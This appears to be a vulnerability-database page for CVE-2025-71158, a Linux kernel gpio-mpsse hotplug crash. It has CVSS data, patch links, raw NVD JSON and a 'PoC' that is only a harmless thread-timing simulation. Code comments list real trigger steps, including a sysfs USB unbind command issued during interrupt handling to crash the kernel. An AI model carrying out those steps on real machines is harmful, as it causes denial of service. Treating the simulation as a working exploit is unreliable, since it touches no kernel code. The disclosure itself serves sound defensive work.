Security Vulnerability Report
CVE-2025-71158 CVSS 5.5 MEDIUM

Published: 2026-01-23 16:15:53
Last Modified: 2026-02-26 20:20:08
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

gpio: mpsse: ensure worker is torn down

When an IRQ worker is running, unplugging the device would cause a crash. The sealevel hardware this driver was written for was not hotpluggable, so I never realized it.

This change uses a spinlock to protect a list of workers, which it tears down on disconnect.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel gpio-mpsse driver (vulnerable before 179ef1127d7a4f09f0e741fa9f30b8a8e7886271)
Linux kernel gpio-mpsse driver (vulnerable before 472d900c8bcac301ae0e40fdca7db799bd989ff5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-71158 PoC - gpio-mpsse hotplug crash trigger
 * This PoC demonstrates the race condition in MPSSE driver.
 * It is a user-space simulation of the timing only: the two threads
 * print messages and sleep, and nothing here touches the kernel or
 * the gpio-mpsse driver.
 * Compile: gcc -o mpsse_poc mpsse_poc.c -lpthread
 */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>

void *irq_worker_trigger(void *arg)
{
    (void)arg;
    /* Simulate IRQ worker running */
    printf("[*] IRQ worker thread started\n");
    sleep(2);
    printf("[*] IRQ worker thread completed\n");
    return NULL;
}

void *device_unplug_trigger(void *arg)
{
    (void)arg;
    /* Simulate hot-unplug scenario: fires while the worker is still asleep */
    sleep(1);
    printf("[*] Simulating device unplug during IRQ processing...\n");
    /* In real scenario: echo 1-1.3 > /sys/bus/usb/drivers/usb/unbind */
    return NULL;
}

int main(void)
{
    pthread_t worker_thread, unplug_thread;

    printf("[*] CVE-2025-71158 PoC - gpio-mpsse hotplug crash\n");
    printf("[*] This demonstrates the race condition when device is\n");
    printf("[*] unplugged while IRQ worker is still running\n\n");

    /* Start IRQ worker */
    if (pthread_create(&worker_thread, NULL, irq_worker_trigger, NULL) != 0) {
        fprintf(stderr, "[!] failed to start worker thread\n");
        return EXIT_FAILURE;
    }

    /* Start unplug trigger concurrently */
    if (pthread_create(&unplug_thread, NULL, device_unplug_trigger, NULL) != 0) {
        fprintf(stderr, "[!] failed to start unplug thread\n");
        pthread_join(worker_thread, NULL);
        return EXIT_FAILURE;
    }

    pthread_join(worker_thread, NULL);
    pthread_join(unplug_thread, NULL);

    printf("[*] Race condition triggered - potential crash\n");
    return 0;
}

/*
 * Real-world trigger steps:
 * 1. Load gpio-mpsse driver: modprobe gpio-mpsse
 * 2. Connect FTDI FT232H device
 * 3. Configure GPIO pins as interrupt inputs
 * 4. Generate GPIO interrupts
 * 5. During interrupt handling: echo 1-1.3 > /sys/bus/usb/drivers/usb/unbind
 * 6. Observe kernel crash or oops
 */

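References

https://git.kernel.org/stable/c/179ef1127d7a4f09f0e741fa9f30b8a8e7886271 (Patch)
https://git.kernel.org/stable/c/472d900c8bcac301ae0e40fdca7db799bd989ff5 (Patch)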

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71158", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:52.690", "lastModified": "2026-02-26T20:20:07.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: mpsse: ensure worker is torn down\n\nWhen an IRQ worker is running, unplugging the device would cause a\ncrash. The sealevel hardware this driver was written for was not\nhotpluggable, so I never realized it.\n\nThis change uses a spinlock to protect a list of workers, which\nit tears down on disconnect."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ngpio: mpsse: asegurar que el worker se desmonte\n\nCuando un worker IRQ está en ejecución, desenchufar el dispositivo causaría un fallo. El hardware sealevel para el que se escribió este controlador no era hotpluggable, así que nunca me di cuenta.\n\nEste cambio utiliza un spinlock para proteger una lista de workers, la cual desmonta al desconectar."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.6", "matchCriteriaId": 
"879529BC-5B4C-4EBE-BF1D-1A31404A8B2E"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/179ef1127d7a4f09f0e741fa9f30b8a8e7886271", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/472d900c8bcac301ae0e40fdca7db799bd989ff5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}